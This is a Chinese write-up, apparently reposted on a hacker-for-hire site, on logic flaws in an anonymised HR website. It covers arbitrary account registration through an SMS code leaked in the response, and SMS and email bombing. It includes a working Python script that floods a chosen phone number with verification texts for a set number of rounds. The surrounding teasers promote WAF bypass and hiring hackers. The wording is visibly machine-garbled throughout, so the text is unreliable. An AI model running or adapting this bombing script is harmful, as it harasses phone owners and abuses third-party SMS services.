某HR业务网站逻辑漏洞挖掘案例以及POC编写思路分享-黑客接单平台

访客5年前黑客工具1086
东西预备 BurpSuiteFree (或许咱们最喜爱最常用的抓包神器,需求Java环境); 火狐浏览器(个人比较喜爱的浏览器;360/Chrome等浏览器都能够); SwitchyOmega插件(设置快速切换署理的浏览器插件); Python3(用来后期编写批量验证缝隙损害的POC)。 测验方针 方针:https://www_hddddddddd_com/(脱敏) IP地址:47.***.**.** 运营商:我国香港阿里云|网站中间件:Tomcat 操作体系:Linux Web结构:Bootstrap 已挖掘出的逻辑缝隙类型 恣意手机用户注册; 注册短信验证码轰炸; 暗码重置邮件轰炸; 未授权拜访导致灵敏信息走漏。 一、恣意手机用户注册(低危) (1)翻开浏览器,拜访该HR事务体系的注册页面(如下图所示): (2)在注册人手机输入框中随意恣意输入一个11位的手机号码,然后在浏览器中按F12调试出浏览器的开发者东西点击”Network”。然后点击“获取验证码”的按钮。然后咱们能够清楚看到Response成功显现了6位验证码。 (3)从头获取6位验证码进行恣意账号注册: (4)成功复现恣意账户注册: 二、注册短信验证码轰炸 (1)翻开BurpSuiteFree设置好浏览器的本地署理: (2)咱们抓取获取验证码的恳求包: (3)然后按Ctrl+R把这个恳求包发送到“Repeater”模块: (4)然后点击“Go”发送恳求包检查呼应数据包: 能够看到呼应包成功呼应而且返回了6位的验证码。 (5)接连点击“Go”发送恳求包检查呼应包: 能够看到每次的呼应包中的6位验证码都不相同,疑似存在短信验证码轰炸缝隙,这时候咱们要祭出咱们的Python来编写”验证码轰炸的POC”。 POC编写中心思路:经过Requests模块批量模仿浏览器客户端恳求获取注册验证码的数据包发送。 短信验证码轰炸POC代码如下: # -- coding: utf-8 -- import requests session = requests.session() headers = {'Referer':"https://www.**********.com/*****/reg", 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'} n=0 url=("https://www.*********.com/r***/getMobileCode") def SmsBoom(phpnumber,url): data = {'mobile': phpnumber,} ron = session.post(url, headers=headers, data=data) phpnumber = input("请输入你的手机号码:") AckNumber = int(input("请你输入进犯的次数:")) while True: SmsBoom(phpnumber,url) n += 1 print("[+]成功发送{}条".format(n)) if n == AckNumber: print('完毕进犯') break SmsBoom(phpnumber,url) POC运转作用截图: POC运转后会让你输入承受的手机号码和进犯测验的次数来验证短信验证码轰炸缝隙,然后回车POC就会主动运转了。 手机短信收件箱的截图: 成功接收到20条注册验证码短信,成功验证而且复现了短信验证码轰炸缝隙。[1][2][3]黑客接单网

相关文章

新手攻略:DVWA-1.9全等级教程之Insecure CAPTCHA

现在,最新的DVWA现已更新到1.9版别(http://www.dvwa.co.uk/),而网上的教程大多停留在旧版别,且没有针对DVWA high等级的教程,因而萌发了一个编撰新手教程的主意,过错的...

MySQL联合注入之绕过安全狗到GetShell

发现网上公开过安全狗的办法少之又少,并且根本都是给个大约点就完毕,本文章是将整个进程记录了一遍,因为一开始我也没想到我能成功的绕过去,大约进程是这样:Mysql根底有必要要有–>定位—>f...

根据Session的身份盗取

一、Session是什么 暗码与证书等认证手法,一般用于登录进程。用户登录之后,服务器通常会树立一个新的Session保存用户的状况和相关信息,用以盯梢用户的状况。每个Session对应一个标识符Se...

PHP中该怎样避免SQL注入?

问题描述: 假如用户输入的数据在未经处理的情况下刺进到一条SQL查询句子,那么运用将很可能遭受到SQL注入进犯,正如下面的比如: $unsafe_variable = $_POST['user_in...

在网上接单的那些黑客到底是不是真的?免费黑客网联系方式

在这个社会,特别是在我们国家,我们都特别注意女孩应该有所保留,不要太活跃。因此,接触的开始基本上是由男孩发起的,就像男孩应该追求女孩一样。 现在互联网如此发达,以至于很多人开始在网上聊天...

服务器遇到大流量进犯的处理进程

 事例描述 早上接到 IDC 的电话,说咱们的一个网段 IP 不断的向外发包,应该是被进犯了,详细哪个 IP不知道,让咱们检查一下。 按理剖析及解决办法 首要咱们要先确定是哪台机器的网卡在向外发包,还...